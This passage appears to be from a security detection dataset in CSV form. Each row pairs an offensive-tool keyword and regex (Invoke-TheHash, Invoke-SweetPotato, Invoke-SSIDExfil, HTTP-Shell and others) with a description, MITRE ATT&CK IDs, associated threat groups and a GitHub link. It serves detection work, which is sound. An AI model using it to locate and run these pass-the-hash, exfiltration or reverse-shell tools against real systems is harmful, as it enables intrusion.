"*Invoke-Ssharp *",".{0,1000}Invoke\-Ssharp\s.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","49725"
"*Invoke-SSharp.ps1*",".{0,1000}Invoke\-SSharp\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","49726"
"*Invoke-SSHCommand.ps1*",".{0,1000}Invoke\-SSHCommand\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1094","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","49727"
"*Invoke-SSIDExfil*",".{0,1000}Invoke\-SSIDExfil.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","49728"
"*Invoke-SSIDExfil*",".{0,1000}Invoke\-SSIDExfil.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","49729"
"*Invoke-StandIn.*",".{0,1000}Invoke\-StandIn\..{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","49730"
"*invoke-stealth.php*",".{0,1000}invoke\-stealth\.php.{0,1000}","offensive_tool_keyword","HTTP-Shell","MultiPlatform HTTP Reverse Shell","T1573.001 - T1104 - T1205 - T1110","TA0005 - TA0011","N/A","N/A","C2","https://github.com/JoelGMSec/HTTP-Shell","1","0","N/A","N/A","10","10","231","33","2024-09-27T10:23:14Z","2023-09-05T12:01:17Z","49731"
"*Invoke-Stealth.ps1*",".{0,1000}Invoke\-Stealth\.ps1.{0,1000}","offensive_tool_keyword","HTTP-Shell","MultiPlatform HTTP Reverse Shell","T1573.001 - T1104 - T1205 - T1110","TA0005 - TA0011","N/A","N/A","C2","https://github.com/JoelGMSec/HTTP-Shell","1","1","N/A","N/A","10","10","231","33","2024-09-27T10:23:14Z","2023-09-05T12:01:17Z","49732"
"*Invoke-StealthUserHunter *",".{0,1000}Invoke\-StealthUserHunter\s.{0,1000}","offensive_tool_keyword","FruityC2","ruityC2 is a post-exploitation framework based on the deployment of agents on compromised machines","T1090 - T1572 - T1071.001","TA0010 - TA0011 - TA0008 - TA0005","N/A","MuddyWater","C2","https://github.com/xtr4nge/FruityC2","1","0","N/A","https://documents.trendmicro.com/assets/white_papers/wp_new_muddywater_findings_uncovered.pdf","10","10","208","67","2017-12-04T17:05:23Z","2017-01-11T17:27:45Z","49733"
"*invokestealthuserhunter*",".{0,1000}invokestealthuserhunter.{0,1000}","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","N/A","10","10","67","18","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z","49734"
"*Invoke-StealthUserHunter*",".{0,1000}Invoke\-StealthUserHunter.{0,1000}","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","N/A","10","10","67","18","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z","49735"
"*Invoke-StealthUserHunter*",".{0,1000}Invoke\-StealthUserHunter.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","49736"
"*Invoke-StealthUserHunter*",".{0,1000}Invoke\-StealthUserHunter.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","49737"
"*Invoke-StickyNotesExtract*",".{0,1000}Invoke\-StickyNotesExtract.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","49738"
"*Invoke-Stompy*",".{0,1000}Invoke\-Stompy.{0,1000}","offensive_tool_keyword","Stompy","Timestomp Tool to flatten MAC times with a specific timestamp","T1070.006","TA0005","N/A","N/A","Defense Evasion","https://github.com/ZephrFish/Stompy","1","0","N/A","N/A","10","1","46","6","2023-10-15T17:38:23Z","2023-10-14T23:40:32Z","49739"
"*Invoke-SweetPotato*",".{0,1000}Invoke\-SweetPotato.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","49740"
"*Invoke-SweetPotato.ps1*",".{0,1000}Invoke\-SweetPotato\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","49741"
"*Invoke-SystemStartupCheck*",".{0,1000}Invoke\-SystemStartupCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","49742"
"*Invoke-SystemStartupHistoryCheck*",".{0,1000}Invoke\-SystemStartupHistoryCheck.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","49743"
"*Invoke-SystemStartupHistoryCheck*",".{0,1000}Invoke\-SystemStartupHistoryCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","49744"
"*Invoke-Tater *",".{0,1000}Invoke\-Tater\s.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","49745"
"*Invoke-Tater.*",".{0,1000}Invoke\-Tater\..{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Invoke-Tater.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","49746"
"*Invoke-Tater.ps1*",".{0,1000}Invoke\-Tater\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1119","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","49747"
"*Invoke-Tater.ps1*",".{0,1000}Invoke\-Tater\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","49748"
"*Invoke-TcpEndpointsCheck*",".{0,1000}Invoke\-TcpEndpointsCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","49749"
"*Invoke-TheHash*",".{0,1000}Invoke\-TheHash.{0,1000}","offensive_tool_keyword","Invoke-TheHash","Invoke-TheHash contains PowerShell functions for performing pass the hash WMI and SMB tasks. WMI and SMB connections are accessed through the .NET TCPClient. Authentication is performed by passing an NTLM hash into the NTLMv2 authentication protocol. Local administrator privilege is not required client-side.","T1028 - T1047 - T1075 - T1078","TA0003 - TA0004 - TA0006","N/A","FoxKitten","Lateral Movement","https://github.com/Kevin-Robertson/Invoke-TheHash","1","0","N/A","N/A","10","10","1569","308","2018-12-09T15:38:36Z","2017-01-03T01:05:39Z","49750"
"*Invoke-TheHash.ps1*",".{0,1000}Invoke\-TheHash\.ps1.{0,1000}","offensive_tool_keyword","Invoke-TheHash","Invoke-TheHash contains PowerShell functions for performing pass the hash WMI and SMB tasks. WMI and SMB connections are accessed through the .NET TCPClient. Authentication is performed by passing an NTLM hash into the NTLMv2 authentication protocol. Local administrator privilege is not required client-side.","T1028 - T1047 - T1075 - T1078","TA0003 - TA0004 - TA0006","N/A","FoxKitten","Lateral Movement","https://github.com/Kevin-Robertson/Invoke-TheHash","1","1","N/A","N/A","10","10","1569","308","2018-12-09T15:38:36Z","2017-01-03T01:05:39Z","49751"
"*Invoke-TheHash.psd1*",".{0,1000}Invoke\-TheHash\.psd1.{0,1000}","offensive_tool_keyword","Invoke-TheHash","Invoke-TheHash contains PowerShell functions for performing pass the hash WMI and SMB tasks. WMI and SMB connections are accessed through the .NET TCPClient. Authentication is performed by passing an NTLM hash into the NTLMv2 authentication protocol. Local administrator privilege is not required client-side.","T1028 - T1047 - T1075 - T1078","TA0003 - TA0004 - TA0006","N/A","FoxKitten","Lateral Movement","https://github.com/Kevin-Robertson/Invoke-TheHash","1","1","N/A","N/A","10","10","1569","308","2018-12-09T15:38:36Z","2017-01-03T01:05:39Z","49752"
"*Invoke-TheHash.psm1*",".{0,1000}Invoke\-TheHash\.psm1.{0,1000}","offensive_tool_keyword","Invoke-TheHash","Invoke-TheHash contains PowerShell functions for performing pass the hash WMI and SMB tasks. WMI and SMB connections are accessed through the .NET TCPClient. Authentication is performed by passing an NTLM hash into the NTLMv2 authentication protocol. Local administrator privilege is not required client-side.","T1028 - T1047 - T1075 - T1078","TA0003 - TA0004 - TA0006","N/A","FoxKitten","Lateral Movement","https://github.com/Kevin-Robertson/Invoke-TheHash","1","1","N/A","N/A","10","10","1569","308","2018-12-09T15:38:36Z","2017-01-03T01:05:39Z","49753"
